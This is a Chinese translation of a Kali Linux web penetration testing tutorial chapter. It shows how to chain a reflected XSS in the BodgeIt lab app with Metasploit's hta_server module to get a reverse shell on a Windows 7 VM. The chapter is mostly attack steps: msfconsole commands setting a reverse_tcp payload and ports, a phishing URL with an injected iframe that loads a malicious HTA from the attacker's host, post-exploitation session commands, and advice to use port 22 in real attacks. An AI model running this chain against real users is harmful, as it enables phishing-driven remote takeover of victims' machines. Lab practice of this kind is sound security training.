专栏首页玄魂工作室Kali Linux Web渗透测试手册(第二版) - 5.8 - 使用XSS和Metasploit获取远程shell

Kali Linux Web渗透测试手册(第二版) - 5.8 - 使用XSS和Metasploit获取远程shell

翻译来自掣雷小组 成员信息:

thr0cyte,Gr33k,花花,MrTools,R1ght0us,7089bAt

标记红色的部分为今日更新内容。

第五章、使用跨站脚本攻击客户端

5.0、介绍

5.1、使用浏览器绕过客户端控制

5.2、识别跨站脚本漏洞

5.3、利用XSS获取Cookie

5.4、利用DOM XSS

5.5、利用BeEF执行xss攻击

5.6、从Web存储中提取信息

5.7、使用ZAP测试WebSokets

5.8、使用XSS和Metasploit获取远程shell


5.8、使用XSS和Metasploit获取远程shell

在前几章中,我们知道了攻击者可以使用XSS提取用户信息凭证,然而,它的威力可不止于此,只要稍加一些社会工程学,攻击者就可以使用XSS来欺骗用户下载执行恶意文件,从而进一步控制主机和内网。

在本章节中,我们将学的使用XSS在目标计算机上远程执行命令。

环境准备

1. vm_1漏洞系统BodgeIt;

2. Windows7虚拟机;

实战演练

我们要做是用XSS使客户端的Windows7的浏览器打开并执行托管在Kali Linux上的恶意HTA文件。

1. 打开Metasploit控制台:

msfconsole

2. 启动后,使用以下命令加载exploit模块和payload:

use exploit/windows/misc/hta_server set payload windows/shell/reverse_tcp

3. 设置server的监听端口为8880:

set srvport 8888

4. 设置本地监听端口为12345:

set lport 12345 show options

5.现在我们运行exploit等待客户端连接:

run

注意服务器启动时给出的信息,Local IP给出了访问HTA文件的方式。(就像是:k0Pjsl1tz2cI3Mm.hta)

6.现在切换到Windows虚拟机,打开IE浏览器

7.假设攻击者发送了一封包含链接的钓鱼电子邮件,

http://192.168.56.11/bodgeit/search.jsp?q=t<iframe src="http://192.168.56.10:8888/k0Pjsl1tz2cI3Mm.hta"></iframe>

给受害者,在IE中打开它

8.如果你的骗人的手段足够高,就可以使得用户接受不安全警告下载执行恶意文件:

9.当提示运行、保存或者取消时,选择运行HTA文件

10.现在切换回Kali,你就可以在控制台中看到Metasploit已经成功收到来自客户端的负载请求并且建立了Shell连接。

11.在我们这个例子中,Metasploit建立的会话在2上,我们可以使用Session命令查看详细信息

12.使用session -i 2命令,你就会跳入Windows命令窗口下。执行ipconfig命令来查看受害者的IP信息

原理剖析

HTA是可以不受网页浏览器安全模式的限制来执行程序,它是一种HTML应用程序。

我们刚才使用Metasploit生成恶意的HTA文件并开启本地服务来托管它,我们的恶意文件包含一个 反向shell,反向shell是一个程序,当受害者执行它时,它将连接到攻击者的服务器,而不是在受害者中打开一个端口来等待连接传入,这也就是为什么它被称为反向连接的原因。当连接完成时,一个远程shell就建立好了。

在上面的例子中,我们使用8888作为服务器的监听端口,12345作为漏洞反向连接的监听端口,然而在实际的应用场景中,我们应该使用较为低的端口,这样可以较为安全,SSH的22端口就是个不错的选择。

本文分享自微信公众号 - 玄魂工作室(xuanhun521)

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2018-12-29

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • Python黑帽编程 3.5 DTP攻击

    由于条件限制,本节的代码我没有在实际环境下测试,不保证有效,欢迎讨论。 3.5.1 DTP协议 动态中继协议 DTP(Dynamic Trunking Prot...

    用户1631416
  • 电子教程: 渗透测试实战第三版(红队版)开源发布

    本书英文名:The Hacker Playbook 3,大概几个月前我大致浏览了一下,做了翻译的计划。今天突然看到有朋友转发github上的翻译:

    用户1631416
  • CVE-2020-8547 phpList 3.5.0 - Authentication Bypass 漏洞复现

    phpList是用于管理邮件列表的开源软件。它设计用于向订户列表传播信息,例如新闻通讯,新闻,广告。它用PHP编写,并使用MySQL数据库存储信息。phpLis...

    用户1631416
  • PHP内存中的对象和引用简介

    我首次起草这篇文章是在备战我的PHP认证时,以便更好地了解PHP如何管理内存中的变量和对象。经过大量研究,我意识到找到我的问题的答案并不容易,所以一旦我完成了,...

    汐楓
  • shell脚本中的case条件语句介绍和使用案例

    #前言:这篇我们接着写shell的另外一个条件语句case,上篇讲解了if条件语句。case条件语句我们常用于实现系统服务启动脚本等场景,case条件语句也相当...

    guoke-boy
  • 使用pd从数据库逆向生成pdm文件

    用户1141560
  • 预测:云计算及数据中心未来发展的5个趋势

    如今,大数据时代已经降临,云端的作用日益凸显。人们几乎可以摆脱传统的硬件储存方式,只要有能上网,人们便可轻易从云数据中心进行储存、调取各种所需资料,如图片、文档...

    静一
  • jQuery点击按钮,生成input输入框

    需求,点击添加按钮,生成input输入框,如果上一个输入框为空,则弹出提示框提示,若不为空,则生成一行input框。

    祈澈菇凉
  • 11.1 LAMP架构介绍

    LAMP架构介绍 LAMP架构包含了 Linux+Apache(httpd)+MySQL+PHP ,简称LAMP Linux是操作系统,比如centos,U...

    运维小白
  • 码云推荐 | 基于EasyUI 1.5.x 的免费美化主题包

    作者语 Insdep theme是基于EasyUI 1.5.x 的一款免费的美化主题包,拥有百度编辑器、cropper、Highcharts、justgage、...

    码云Gitee

扫码关注云+社区

领取腾讯云代金券